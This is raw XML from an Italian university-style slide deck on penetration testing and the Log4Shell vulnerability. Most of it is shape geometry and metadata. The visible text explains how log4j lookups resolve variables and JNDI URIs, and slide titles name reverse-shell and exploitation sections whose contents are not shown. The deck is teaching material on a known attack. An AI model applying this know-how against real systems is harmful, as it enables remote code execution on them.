                <a:gd name="connsiteX11" fmla="*/ 1284280 w 2529723"/>
                <a:gd name="connsiteY11" fmla="*/ 2350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723" h="6858000">
                  <a:moveTo>
                    <a:pt x="1258269" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1275627" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1302560" y="24338"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2156831" y="855667"/>
                    <a:pt x="2590622" y="2191755"/>
                    <a:pt x="2522825" y="3678515"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2459072" y="5076606"/>
                    <a:pt x="1519830" y="5692656"/>
                    <a:pt x="557500" y="6451411"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="382255" y="6589587"/>
                    <a:pt x="208689" y="6724853"/>
                    <a:pt x="32482" y="6849373"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="19531" y="6858000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="6858000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14202" y="6848540"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="190409" y="6724020"/>
                    <a:pt x="363976" y="6588754"/>
                    <a:pt x="539221" y="6450578"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1501550" y="5691822"/>
                    <a:pt x="2440792" y="5075773"/>
                    <a:pt x="2504546" y="3677682"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2572343" y="2190921"/>
                    <a:pt x="2138551" y="854834"/>
                    <a:pt x="1284280" y="2350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59AC73F7-22BD-4C46-B368-3F03B8478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84327" y="0"/>
              <a:ext cx="2536434" cy="6858000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 879731 w 2536434"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
                <a:gd name="connsiteX1" fmla="*/ 913411 w 2536434"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
                <a:gd name="connsiteX2" fmla="*/ 935535 w 2536434"/>
                <a:gd name="connsiteY2" fmla="*/ 14997 h 6858000"/>
                <a:gd name="connsiteX3" fmla="*/ 2536434 w 2536434"/>
                <a:gd name="connsiteY3" fmla="*/ 3621656 h 6858000"/>
                <a:gd name="connsiteX4" fmla="*/ 662084 w 2536434"/>
                <a:gd name="connsiteY4" fmla="*/ 6374814 h 6858000"/>
                <a:gd name="connsiteX5" fmla="*/ 145436 w 2536434"/>
                <a:gd name="connsiteY5" fmla="*/ 6780599 h 6858000"/>
                <a:gd name="connsiteX6" fmla="*/ 33680 w 2536434"/>
                <a:gd name="connsiteY6" fmla="*/ 6858000 h 6858000"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 2536434"/>
                <a:gd name="connsiteY7" fmla="*/ 6858000 h 6858000"/>
                <a:gd name="connsiteX8" fmla="*/ 111756 w 2536434"/>
                <a:gd name="connsiteY8" fmla="*/ 6780599 h 6858000"/>
                <a:gd name="connsiteX9" fmla="*/ 628404 w 2536434"/>
                <a:gd name="connsiteY9" fmla="*/ 6374814 h 6858000"/>
                <a:gd name="connsiteX10" fmla="*/ 2502754 w 2536434"/>
                <a:gd name="connsiteY10" fmla="*/ 3621656 h 6858000"/>
                <a:gd name="connsiteX11" fmla="*/ 901855 w 2536434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6434" h="6858000">
                  <a:moveTo>
                    <a:pt x="879731" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="913411" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="935535" y="14997"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1962698" y="754641"/>
                    <a:pt x="2536434" y="2093192"/>
                    <a:pt x="2536434" y="3621656"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2536434" y="4969131"/>
                    <a:pt x="1607709" y="5602839"/>
                    <a:pt x="662084" y="6374814"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="489881" y="6515397"/>
                    <a:pt x="319254" y="6653108"/>
                    <a:pt x="145436" y="6780599"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="33680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5C99F96-8984-456F-BD66-5C019A651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53086" y="0"/>
              <a:ext cx="2261351" cy="6858000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 879731 w 2521425"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
                <a:gd name="connsiteX1" fmla="*/ 898402 w 2521425"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
                <a:gd name="connsiteX2" fmla="*/ 920526 w 2521425"/>
                <a:gd name="connsiteY2" fmla="*/ 14997 h 6858000"/>
                <a:gd name="connsiteX3" fmla="*/ 2521425 w 2521425"/>
                <a:gd name="connsiteY3" fmla="*/ 3621656 h 6858000"/>
                <a:gd name="connsiteX4" fmla="*/ 647075 w 2521425"/>
                <a:gd name="connsiteY4" fmla="*/ 6374814 h 6858000"/>
                <a:gd name="connsiteX5" fmla="*/ 130427 w 2521425"/>
                <a:gd name="connsiteY5" fmla="*/ 6780599 h 6858000"/>
                <a:gd name="connsiteX6" fmla="*/ 18671 w 2521425"/>
                <a:gd name="connsiteY6" fmla="*/ 6858000 h 6858000"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 2521425"/>
                <a:gd name="connsiteY7" fmla="*/ 6858000 h 6858000"/>
                <a:gd name="connsiteX8" fmla="*/ 111756 w 2521425"/>
                <a:gd name="connsiteY8" fmla="*/ 6780599 h 6858000"/>
                <a:gd name="connsiteX9" fmla="*/ 628404 w 2521425"/>
                <a:gd name="connsiteY9" fmla="*/ 6374814 h 6858000"/>
                <a:gd name="connsiteX10" fmla="*/ 2502754 w 2521425"/>
                <a:gd name="connsiteY10" fmla="*/ 3621656 h 6858000"/>
                <a:gd name="connsiteX11" fmla="*/ 901855 w 2521425"/>
                <a:gd name="connsiteY11" fmla="*/ 14997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1425" h="6858000">
                  <a:moveTo>
                    <a:pt x="879731" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="898402" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="920526" y="14997"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1947689" y="754641"/>
                    <a:pt x="2521425" y="2093192"/>
                    <a:pt x="2521425" y="3621656"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2521425" y="4969131"/>
                    <a:pt x="1592700" y="5602839"/>
                    <a:pt x="647075" y="6374814"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="474872" y="6515397"/>
                    <a:pt x="304245" y="6653108"/>
                    <a:pt x="130427" y="6780599"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="18671" y="6858000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="6858000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111756" y="6780599"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="285574" y="6653108"/>
                    <a:pt x="456201" y="6515397"/>
                    <a:pt x="628404" y="6374814"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1574029" y="5602839"/>
                    <a:pt x="2502754" y="4969131"/>
                    <a:pt x="2502754" y="3621656"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2502754" y="2093192"/>
                    <a:pt x="1929018" y="754641"/>
                    <a:pt x="901855" y="14997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eiryo"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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3AF86E8-055A-E130-706F-BD06F60A7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75" y="2312988"/>
            <a:ext cx="6857365" cy="3651250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Grazie per l’attenzione.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11551530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1A64AC-7BAE-45DF-30BF-7A9A733F2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Bibliografia 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8B64B68-B775-B78F-2655-F2F7D85BD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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://logging.apache.org/log4j/2.x/</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=Y8a5nB-vy78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52395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C146BD-8FC2-21C4-EF04-C57BCF23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Plugin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Lookup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9ABA4E-89C2-83C4-F7A5-4657644EE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0206" y="2107096"/>
            <a:ext cx="8391967" cy="2846567"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Tra i vari plugin, quello di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>lookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> risulta chiaramente il più interessante per una libreria di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>logging</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>. In particolare, il plugin di log4j è in grado letteralmente di loggare un qualunque tipo di variabile dichiarata all’interno del plugin, fornendo diverse risoluzioni in merito alla natura della variabile.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3599976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C146BD-8FC2-21C4-EF04-C57BCF23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Plugin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Lookup</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0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47BDC133-2F24-7D28-2139-48916FAE7D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0875" y="2246742"/>
            <a:ext cx="8771839" cy="4168345"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3593550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C146BD-8FC2-21C4-EF04-C57BCF23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Plugin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Lookup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AB46D49-964D-0530-6473-BAE2853E0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Nell’esempio riportato nella slide precedente , la variabile che viene stampata è </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>apiVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> , in questo caso è di tipo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>, ma in generale il metodo di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Lookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> di log4j riceve un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>LogEvent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> ed una stringa  e restituisce una stringa da loggare, che verrà inserita all’interno della variabile. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="883462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9C146BD-8FC2-21C4-EF04-C57BCF236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75" y="442913"/>
            <a:ext cx="6857365" cy="1344612"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Plugin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Lookup</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty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AB46D49-964D-0530-6473-BAE2853E0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/>
              <a:t>In particolare, se la stringa è una variabile di sistema, ad esempio $PATH, il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>logger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> è in grado di «comprendere» che deve stampare il valore di della variabile, stampando quindi i percorsi dei vari binari da eseguire in ogni contesto.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Se la stringa è una URI in particolare una URI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>jndi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>, il metodo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>lookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> si comporta come segue:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34104653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LinesVTI">
  <a:themeElements>
    <a:clrScheme name="AnalogousFromRegularSeedLeftStep">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="2D1B30"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="F0F3F1"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="C649A4"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="A338B5"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="8149C6"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="4340B8"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="497AC6"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="389DB5"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="349D51"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="7F7F7F"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="Custom 7">
      <a:majorFont>
        <a:latin typeface="Meiryo"/>
        <a:ea typeface=""/>
        <a:cs typeface=""/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Meiryo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LinesVTI" id="{8C0B0F05-C8D0-4078-9615-83E590287484}" vid="{43A7BC57-C1E3-4EE6-BDBC-5422DD574AF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2009</TotalTime>
  <Words>2239</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>154</Paragraphs>
  <Slides>59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59</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="64" baseType="lpstr">
      <vt:lpstr>Meiryo</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Corbel</vt:lpstr>
      <vt:lpstr>SketchLinesVTI</vt:lpstr>
      <vt:lpstr> Penetration testing and ethical hacking</vt:lpstr>
      <vt:lpstr>Log4J</vt:lpstr>
      <vt:lpstr>Log4J</vt:lpstr>
      <vt:lpstr>Log4J v2 </vt:lpstr>
      <vt:lpstr>Plugin Log4j v2</vt:lpstr>
      <vt:lpstr>Plugin Lookup</vt:lpstr>
      <vt:lpstr>Plugin Lookup</vt:lpstr>
      <vt:lpstr>Plugin Lookup</vt:lpstr>
      <vt:lpstr>Plugin Lookup</vt:lpstr>
      <vt:lpstr>Presentazione standard di PowerPoint</vt:lpstr>
      <vt:lpstr>Plugin di Lookup</vt:lpstr>
      <vt:lpstr>Plugin di Lookup</vt:lpstr>
      <vt:lpstr>Log4Shell</vt:lpstr>
      <vt:lpstr>Log4Shell</vt:lpstr>
      <vt:lpstr>Log4Shell</vt:lpstr>
      <vt:lpstr>Log4Shell</vt:lpstr>
      <vt:lpstr>Panoramica dell’attacco</vt:lpstr>
      <vt:lpstr>Presentazione standard di PowerPoint</vt:lpstr>
      <vt:lpstr>Pentesting</vt:lpstr>
      <vt:lpstr>Target Scoping</vt:lpstr>
      <vt:lpstr>Target Scoping</vt:lpstr>
      <vt:lpstr>Information Gathering</vt:lpstr>
      <vt:lpstr>Information Gathering</vt:lpstr>
      <vt:lpstr>Information Gathering</vt:lpstr>
      <vt:lpstr>Information Gathering</vt:lpstr>
      <vt:lpstr>Information Gathering</vt:lpstr>
      <vt:lpstr>Information Gathering</vt:lpstr>
      <vt:lpstr>Information Gathering</vt:lpstr>
      <vt:lpstr>Presentazione standard di PowerPoint</vt:lpstr>
      <vt:lpstr>Information Gathering</vt:lpstr>
      <vt:lpstr>Enumerating target</vt:lpstr>
      <vt:lpstr>Enumerating target</vt:lpstr>
      <vt:lpstr>Enumerating target</vt:lpstr>
      <vt:lpstr>Vulnerability Mapping</vt:lpstr>
      <vt:lpstr>Vulnerability Mapping</vt:lpstr>
      <vt:lpstr>Vulnerability Mapping</vt:lpstr>
      <vt:lpstr>Vulnerability Mapping</vt:lpstr>
      <vt:lpstr>Vulnerability mapping</vt:lpstr>
      <vt:lpstr>Vulnerability Mapping</vt:lpstr>
      <vt:lpstr> Target Exploitation</vt:lpstr>
      <vt:lpstr> Target Exploitation</vt:lpstr>
      <vt:lpstr>Target Exploitation</vt:lpstr>
      <vt:lpstr>Target Exploitation</vt:lpstr>
      <vt:lpstr>Target Explotation</vt:lpstr>
      <vt:lpstr>Target Exploitation</vt:lpstr>
      <vt:lpstr>Target Exploitation</vt:lpstr>
      <vt:lpstr>Target Exploitation </vt:lpstr>
      <vt:lpstr>Target Exploitation</vt:lpstr>
      <vt:lpstr>Target Exploitation</vt:lpstr>
      <vt:lpstr>Fasi dell’exploit</vt:lpstr>
      <vt:lpstr>Presentazione standard di PowerPoint</vt:lpstr>
      <vt:lpstr>Verifica</vt:lpstr>
      <vt:lpstr>Presentazione standard di PowerPoint</vt:lpstr>
      <vt:lpstr>Reverse shell </vt:lpstr>
      <vt:lpstr>Reverse shell </vt:lpstr>
      <vt:lpstr>Presentazione standard di PowerPoint</vt:lpstr>
      <vt:lpstr>Penetration Testing Report</vt:lpstr>
      <vt:lpstr>Presentazione standard di PowerPoint</vt:lpstr>
      <vt:lpstr>Bibliografia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Forensics</dc:title>
  <dc:creator>MARIO GIORDANO</dc:creator>
  <cp:lastModifiedBy>Mario Giordano</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-06-05T09:57:38Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-09-02T14:02:36Z</dcterms:modified>
</cp:coreProperties>
</file>